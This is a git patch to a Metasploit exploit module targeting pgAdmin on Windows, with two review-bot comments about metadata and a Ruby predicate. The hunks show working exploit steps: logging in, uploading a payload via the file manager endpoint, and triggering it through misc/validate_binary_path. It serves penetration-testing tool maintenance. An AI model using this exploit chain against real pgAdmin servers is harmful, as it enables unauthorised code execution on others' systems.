From 2b7cf76fc85d67464603f6024ef337b9be9ee0af Mon Sep 17 00:00:00 2001 From: igomeow <10775605+igomeow@users.noreply.github.com> Date: Wed, 28 Aug 2024 18:20:20 +0200 Subject: [PATCH] Fixing wrong SideEffects and Reliability values --- .../windows/http/pgadmin_binary_path_api.rb | 85 ++++++++++--------- 1 file changed, 43 insertions(+), 42 deletions(-) diff --git a/modules/exploits/windows/http/pgadmin_binary_path_api.rb b/modules/exploits/windows/http/pgadmin_binary_path_api.rb index 24dddcb13c..12a0f39255 100644 --- a/modules/exploits/windows/http/pgadmin_binary_path_api.rb +++ b/modules/exploits/windows/http/pgadmin_binary_path_api.rb @@ -44,8 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE, ], - 'Reliability' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ], - 'SideEffects' => [ REPEATABLE_SESSION, ] + 'Reliability' => [ REPEATABLE_SESSION, ], + 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ] } ) ) @@ -96,8 +96,9 @@ class MetasploitModule < Msf::Exploit::Remote def on_windows? res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true) - if res&.code == 200 && platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first - return platform == 'win32' ? true : false + if res&.code == 200 + platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first + return platform == 'win32' end end 
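Review bot: The corrected `'SideEffects'` list in the `'Notes'` hash names `ARTIFACTS_ON_DISK`, `CONFIG_CHANGES` and `IOC_IN_LOGS` without saying what each one refers to. Anyone using this metadata for clean-up or detection after an authorised test has to read the whole module to find out. The later hunks show a file upload through `file_manager/filemanager/<trans_id>/` and a POST to `misc/validate_binary_path`, so a short comment per entry would help, for example `# ARTIFACTS_ON_DISK: uploaded file under the pgAdmin storage folder` and `# IOC_IN_LOGS: POSTs to file_manager and validate_binary_path`. Which configuration change `CONFIG_CHANGES` covers is not visible in these hunks and should be confirmed before it is documented.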
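Review bot: In the rewritten `on_windows?`, a failed request or a non-200 status falls out of the `if` and the predicate returns `nil`, so "could not determine" and "not Windows" are indistinguishable; callers are not visible in this hunk. A guard clause, `return false unless res&.code == 200`, makes that path explicit and removes the nested `return`. The `&.` after `scan` and `flatten` is also redundant because `String#scan` always returns an Array. The comparison can be written as `res.body[/pgAdmin\['platform'\]\s*=\s*'([^']+)';/, 1] == 'win32'`.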
@@ -139,17 +140,17 @@ class MetasploitModule < Msf::Exploit::Remote if auth_required? res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'authenticate/login'), - 'method' => 'POST', - 'keep_cookies' => true, - 'vars_post' => { - 'csrf_token' => csrf_token, - 'email' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'], - 'language' => 'en', - 'internal_button' => 'Login' - } - }) + 'uri' => normalize_uri(target_uri.path, 'authenticate/login'), + 'method' => 'POST', + 'keep_cookies' => true, + 'vars_post' => { + 'csrf_token' => csrf_token, + 'email' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'language' => 'en', + 'internal_button' => 'Login' + } + }) unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login') fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin') @@ -171,17 +172,17 @@ class MetasploitModule < Msf::Exploit::Remote def file_manager_init res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'file_manager/init'), - 'method' => 'POST', - 'keep_cookies' => true, - 'ctype' => 'application/json', - 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, - 'data' => { - 'dialog_type' => 'storage_dialog', - 'supported_types' => ['sql', 'csv', 'json', '*'], - 'dialog_title' => 'Storage Manager' - }.to_json - }) + 'uri' => normalize_uri(target_uri.path, 'file_manager/init'), + 'method' => 'POST', + 'keep_cookies' => true, + 'ctype' => 'application/json', + 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, + 'data' => { + 'dialog_type' => 'storage_dialog', + 'supported_types' => ['sql', 'csv', 'json', '*'], + 'dialog_title' => 'Storage Manager' + }.to_json + }) unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir')) fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder') 
@@ -205,13 +206,13 @@ class MetasploitModule < Msf::Exploit::Remote form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"') res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), - 'method' => 'POST', - 'keep_cookies' => true, - 'ctype' => "multipart/form-data; boundary=#{form.bound}", - 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, - 'data' => form.to_s - }) + 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"), + 'method' => 'POST', + 'keep_cookies' => true, + 'ctype' => "multipart/form-data; boundary=#{form.bound}", + 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, + 'data' => form.to_s + }) unless res&.code == 200 && res.get_json_document['success'] == 1 fail_with(Failure::UnexpectedReply, 'Failed to upload file contents') end @@ -221,15 +222,15 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Payload uploaded to: #{upload_path}") send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'), - 'method' => 'POST', - 'keep_cookies' => true, - 'ctype' => 'application/json', - 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, - 'data' => { - 'utility_path' => upload_path[0..upload_path.size - 16] - }.to_json - }) + 'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'), + 'method' => 'POST', + 'keep_cookies' => true, + 'ctype' => 'application/json', + 'headers' => { 'X-pgA-CSRFToken' => csrf_token }, + 'data' => { + 'utility_path' => upload_path[0..upload_path.size - 16] + }.to_json + }) true end